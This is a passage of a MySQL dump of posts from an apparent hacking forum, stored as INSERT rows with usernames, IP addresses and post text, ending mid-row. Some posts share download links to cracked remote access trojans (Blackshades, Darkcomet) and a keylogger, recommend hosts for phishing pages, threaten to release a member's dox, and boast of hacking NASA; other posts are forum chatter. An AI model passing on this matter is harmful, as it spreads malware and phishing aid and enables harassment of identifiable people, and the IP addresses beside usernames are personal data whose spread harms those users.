`longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5255', '821', '5056', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '5', 'Timmy', '1350530157', '[quote=\'R?????zo?\' pid=\'5056\' dateline=\'1350461026\'] [quote=\'?(???)?TREYZ?(???)?\' pid=\'5013\' dateline=\'1350448254\'] im thinking what i should post next [/quote] yeah that\'s a good idea :P I\'m thinking what I should post next too! Oh wait... I posted it [/quote] +3 on this one lol. I\'m wondering why Kody isn\'t picking up the phone.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '24340f366c19078d6e3fd72b07a0dbc6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5256', '935', '0', '19', '[Junk][Junk]Couple of cracked programs.', '0', '5', 'Timmy', '1350530747', '(RAT)Blackshades 4.2 cracked - . http://sharesend.com/download/lylxt (Untested) . http://fs08n1.sendspace.com/dl/eea642d1ec5dc7484517f1707b390a17/502ef28549cb30ff/sbgr3t/blackshades%20cracked.rar (Untested) (RAT)Blackshades 5.0 cracked - . https://www.dropbox.com/s/n4kw7fxdv32ttm1/BlackShades%205.0.rar (Untested) (RAT)Darkcomet PAID cracked - (KEYLOGGER)Predator Dynasty 8 Cracked - . http://adfoc.us/720388933038 (Untested) Enjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '298e7964445e04b02c23fb73db918649', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5257', '936', '0', '18', '4 adf.ly bots with proxygrabber', '0', '5', 'Timmy', '1350531132', '[url=http://postimage.org/image/62s7nniqx/][img]http://s12.postimage.org/62s7nniqx/adfly.jpg[/img][/url] SCREENSHOT : http://s12.postimage.org/5q0thh0h8/adfly.jpg VIRUSSCAN : http://virusscan.jotti.org/en/scanresult/ab534cdeaf447ed8a4885df430a38ce98c847f0b DOWNLOAD : http://adf.ly/DnH3h', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1643ae443f2fb505d19f40b83e6562ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5258', '937', '0', '19', '[Junk]Nude Bot- Mr. Do you want to fap?', '0', '5', 'Timmy', '1350531240', '[b][align=center][color=#1E90FF]Nude Bot is now fixed and uses new-site. This works perfectly now and no-more non-nude pictures.[/color] - Use this to fap, sirs. :D [/align][/b] Credits: nitro_hitman', '72.231.24.165', '1223104677', '1', '0', '5', '1350531261', '1', 'd330687ee5a7a328f17c9352226fa199', '0', '1350531261'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5259', '938', '0', '46', 'List of good webhosts to host your phishing pages', '0', '5', 'Timmy', '1350531544', '[b]FREE HOSTS[/b] [list] [*][url=http://freehostia.com/]Freehostia[/url] - Recommended by [url=http://community.mybboard.net/member.php?action=profile&uid=13901]nathangrubb[/url] Comments: \"A free host, with no artificial limitations like some free hosts. Just like a paid host, except the bandwidth, disk space, etc limits.\" [*][url=http://x10hosting.com/]x10Hosting[/url] - Recommended by [url=http://community.mybboard.net/member.php?action=profile&uid=13967]fedlerner[/url] Comments: \"x10hosting is the top 1 free hosting company. They offer Ad-Enhanced & Ad-Free plans. Their servers are really fast and reliable. They also have paid plans (on different servers) for members that think that their site has grown enough to move to a Paid hosting.\" [b]NOTE:[/b] Please see [wiki]Help:Contents#Host-specific_Problems[/wiki] [*][url=http://www.shockv2.com/]Sv2[/url] - Recommended by [url=http://community.mybboard.net/user-13787.html]Holy Phoenix[/url] Comments: \"It is a free host, that offers stuff without posting. I believe they give more if you do post though.\" [*][url=http://www.vgchat.info]vgchat hosting[/url] - Recommended by [url=http://community.mybboard.net/user-3500.html]scylla[/url] Comments: \"A free host that gives users 300 megs of space & 10 gigs of bandwith, more than enough for an average forum, I\'ve been with them for nearly a year now.\" [*][url=http://phpzilla.net] PhpZilla[/url] - Recommended by [url=http://community.mybboard.net/user-17716.html]Proper[/url] Comments: \"a good free host.\" [/list] Recommended by MyBB Community.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '42c187ae2a6d1d60f4812119f6e2d422', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5260', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '8', 'spacefish36', '1350531947', 'I know how to hack Facebooks but what\'s tetrisfreinds?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '94637ffabf40960c124be2ec7476fe67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5261', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '262', 'RAND0M1ZER', '1350536241', 'Link? What is it? Does it display pictures or something?', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'd41a50838a5d53eb4a49b55beda837ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5262', '816', '4276', '9', 'RE: | Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '262', 'RAND0M1ZER', '1350536288', 'Thanks for the list, I will definitely check some of these out. I\'ve got a few content blogs I\'d like to promote.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'ec61a53d1533c3cbc261a8029edc826d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5263', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '262', 'RAND0M1ZER', '1350536428', 'I used Freehostia before I moved to paid hosting. Definitely recommended, they had very little down time.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'edab280b76b5a20e1b198a38e4bd0b5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5264', '910', '5021', '49', 'RE: Referral Contest?', '0', '222', 'Exposé', '1350536733', 'Nice sweet , I think we could refer alot of members by doing this :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0970c26d502cdf901f4e078b52e2a11d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5265', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350536763', 'Yeh I will when I do the pastebin version :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9bb6e281098e6b70660c989be265996f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5266', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '257', 'XxTREYZxX', '1350536807', 'the game on face book its tetris but you vs people :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '71c94dda67df769dcde08265a0545ee2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5267', '939', '0', '49', 'a contest', '0', '257', 'XxTREYZxX', '1350542350', 'hel L33T, i think we should do a free elite member ship contest where you say why you should get the member ship! who agrees', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'c67b6004cf2984a9de60b3ccf9b67d65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5268', '939', '5267', '49', 'RE: a contest', '0', '222', 'Exposé', '1350542766', 'The admin\'s have given out enough free elite in my opinion. You have to buy it if you want it...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'dad718d3b6d84844de0e72433a3fbdca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5269', '939', '5267', '49', 'RE: a contest', '0', '257', 'XxTREYZxX', '1350542854', 'oh really i didnt know sorry i will close this thread ahah lol', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '3eb1d0cf222a996590b0709d39d10bd4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5270', '940', '0', '7', 'TheAnarchist I have your dox!', '0', '222', 'Exposé', '1350542961', 'Yes TheAnarchist if you see this I have your dox. So don\'t think nobody can find who you are...even though it took me some time I finally found you sir. So stop fuckin with LH or I will release it. I have not released it to anyone yet.... So please stop having your members register. It\'s getting old and very immature. Thanks Have a great day yall :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8d4a5031a977502f183c114a0c6372f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5271', '941', '0', '35', 'Logo Competition for LH?', '0', '222', 'Exposé', '1350543143', 'I think we should have a logo contest..in my opinion we need a badass logo and we should turn it into a competition. Nothing hardcore but a fun activity on LH.... If the admins agree we need a new logo we can start this :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e3175f6f8b155eaf45410c5bb24d5c00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5272', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '257', 'XxTREYZxX', '1350543488', 'i agree i this would be awesome:) great idea my self did not think of this:)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '2896e4e5673ff3dab9c32f0af182c1cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5273', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '222', 'Exposé', '1350543601', 'And I also think the header needs to be redesigned so the logo can go in the middle :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b4115b446207a48f880125409f156edf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5274', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '257', 'XxTREYZxX', '1350543764', 'yeah true you are one smart cookie', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '0cdf73ed4045e623446bdbd4d4f49134', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5275', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '222', 'Exposé', '1350543923', 'Oh alright can I check it out? What do you have to pm me it?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '47dc607d2d4ec5f49b2b89319de17423', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5276', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '258', 'PiXEL^OG', '1350544194', 'Bin hoster is probably the best free hosting for anaything. You basically get unlimited EVERTHING!!! Bandwidth , space , mysql , addon domains etc Seriously you should take a look at it!!', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b2fa780a2cec4545dd825b8a5dcdb8a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5277', '942', '0', '49', 'DDos protected hosting?', '0', '222', 'Exposé', '1350544212', 'Can we get DDos protected hosting? So we don\'t have to worry about ddos attacks....?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9167f560a457960b22d36e887757d8cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5278', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '257', 'XxTREYZxX', '1350544480', 'whats this supposed to mean i am confused +3 on this one lol. I\'m wondering why Kody isn\'t picking up the phone.', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '64876a462b8a89452789eb34798cb72c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5279', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '258', 'PiXEL^OG', '1350544597', 'Actually the admin can get cloudflare DDos protection but it costs extra', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '545e89794b1a0c660774b1f5d95ebf50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5280', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '222', 'Exposé', '1350544735', 'I think we already have cloudflare...not sure if it works tho lmao...I think we got hit like 5 min ago', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '55a2a2ab617c60c887d1e6b7e6483355', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5281', '918', '5088', '65', 'RE: I feel famous', '0', '258', 'PiXEL^OG', '1350544811', 'Umm the dude in the video is famous , not you Plus ive got like 127 000 views in a video i posted of south park and my channel has like 234 000 total views though 14 year old kids have gotten up to 5 million plus a Machinima Partnership', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'babc596ab281ac754248559d97c3dfdd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5282', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '67', 'HoverCatz', '1350544871', 'http://1.bp.blogspot.com/-0iLJgxXE6gA/UH3Hm2ET6tI/AAAAAAAAJ_w/_Ch9uZRi-kQ/s1600/A5RlS7uCIAAZ_5H+copy-1.jpg', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', '11efaa284c4aefd42d63744376f12540', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5283', '943', '0', '74', 'MINECRAFT PREMIUM GIVEAWAY(no surveys)', '17', '257', 'XxTREYZxX', '1350544909', '[size=large][/size]hey l33T today im doing i am giving a minecraft premium if you want a minecraft premium must have 50 post and +rep pm me for the account :) dont be mean or no one gets the account i could be doing some shit as survey but i\'m not so be nice :) pm me for the account first 15 get one, get here quick bye , hope you enjoy 1 down', '203.104.11.7', '-882373881', '1', '0', '257', '1350553775', '1', '13cae15678c8859722df9cef2f453035', '0', '1350553775'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5284', '944', '0', '66', 'What\'s your BF3 Method-ology?', '0', '222', 'Exposé', '1350544960', 'Meaning what do you do in game? I mostly rush in urban places and then in rural places I will snipe.. What\'s your method-ology?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '377157feb310a709df4ff189e3897962', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5285', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '258', 'PiXEL^OG', '1350545070', 'NASA dose not care if their site gets hacked , their work and docs are saved ON PAPER IN FILING CABINETS The reason why they have a site is so that average people who don\'t know much about them can lookup info on their site Even i hacked NASA like twice with a CSRF vul the first one used to work but they patced it , i found a new one i might post it if enough people are interested', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b152b29c795b403d4779be0c22b6d499', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5286', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '257', 'XxTREYZxX', '1350545128', 'my method is play smart and know what your opposition is going to do i will probably own a part of the map the is loaded with people and keep running around own\'ing', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '37ee9fe3b5d463c4793f3d04b4e75f80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5287', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '53', 'sirchamp', '1350545418', 'We have ddos protection. Not even my cloudflare ip getter could get the real ip of this site.', '195.197.239.82', '-1010438318', '1', '0', '0', '0', '1', 'f9f25ae9af020338a39e44f9569db240', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5288', '945', '0', '7', 'I dont want.......', '0', '67', 'HoverCatz', '1350545423', 'Hi. I dont want this forum to be like HF -> Pm me and post to get the download. When i started here every download was in the thread, not in my inbox. This was even a rule, but i dont know what happened with that rule.', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', '7d25364fac304ac92df38c29cae521b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5289', '945', '5288', '7', 'RE: I dont want.......', '0', '222', 'Exposé', '1350545705', 'Well yes I agree. People should post the download in their thread and not say \"Post and pm me for download\"', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '75eb06a0f7950fa4f2337ed92eea7118', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5290', '945', '5288', '7', 'RE: I dont want.......', '0', '257', 'XxTREYZxX', '1350545876', 'i think they do that because people just download it and take notice of what they did.and they dont say thanks for a great share:)', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'de16395e2fb0c22b2ec390317330a8a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5291', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '222', 'Exposé', '1350545963', 'Lmao...idk...just wanted to make sure..we went down like 30 min ago', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ac00ca2a08e76e20beabaddb7cb42054', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5292', '945', '5288', '7', 'RE: I dont want.......', '0', '258', 'PiXEL^OG', '1350546367', 'IKR!! Like ive seen this on MANY other forums before , usually when someone says \"PM me for download link\" its usually someone trying to infect members , be careful everyone', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '0f5340dd117d220f5573a0807a5f1fc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5293', '946', '0', '19', '[Junk]Delete the dam stars :P', '0', '222', 'Exposé', '1350546805', 'Lol if you see underneath the username... [img]http://grab.by/gQwG[/img] the stars don\'t have any use....so I think they should be deleted...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '49bdbfdd7c4b186e967aae372a529555', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5294', '43', '105', '7', 'RE: How did you find us?', '0', '258', 'PiXEL^OG', '1350546941', 'You PMed me on another forum and i was like Ok yeah sure :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'f4901d5330c86a1f3bc5211f881cfc92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5295', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '258', 'PiXEL^OG', '1350547881', 'I think they look cool , It gives you motivation to join groups and get Elite', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '591c8f99a4d6590d5f8d71944d2f40db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5296', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '222', 'Exposé', '1350547954', 'Oh I guess..just a suggestion :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '2e8ccc72f05ede34ce0821615b493fd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5297', '921', '5229', '4', 'RE: Hey', '0', '270', 'LCS', '1350547957', '[quote=\'t3h jok3r\' pid=\'5229\' dateline=\'1350526136\'] Welcome to L33Thacking. [/quote] You just copied over 9000 other people. I\'m joking, I understand that you\'re the admin. Welcome to l33t. Stay active + HQ.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'c00d493f2a015e0cebdaf38807e3bcb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5298', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '53', 'sirchamp', '1350547971', 'I like them. ...Dont delete them .', '112.211.130.93', '1892909661', '1', '0', '0', '0', '1', '502423d8dd415d28f4ae31df94845ca6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5299', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '222', 'Exposé', '1350548039', 'Oh nvm guys people seem to like them so....closed :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '34033d377fe2a6d870374db5e91fe243', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5300', '922', '5183', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350548104', '[quote=\'R?????zo?\' pid=\'5183\' dateline=\'1350511669\'] [quote=\'LCS\' pid=\'5161\' dateline=\'1350501826\'] [quote=\'R?????zo?\' pid=\'5139\' dateline=\'1350500540\'] Look promising. I\'m not in US though, will this work if I have a VPN? Nice thread anyways. [/quote] It is promosing :) Yeah it\'ll work if you use a VPN, although if its a public one it might say you\'ve already completed some surveys. Not too sure. Thanks! :) [/quote] Does not work with a VPN, and I use a paid one [spoiler] [img]http://i.imgur.com/pkLQC.png[/img] [/spoiler] [/quote] No idea then, sorry. You don\'t have to be in the US anyway to use it; its worldwide.', 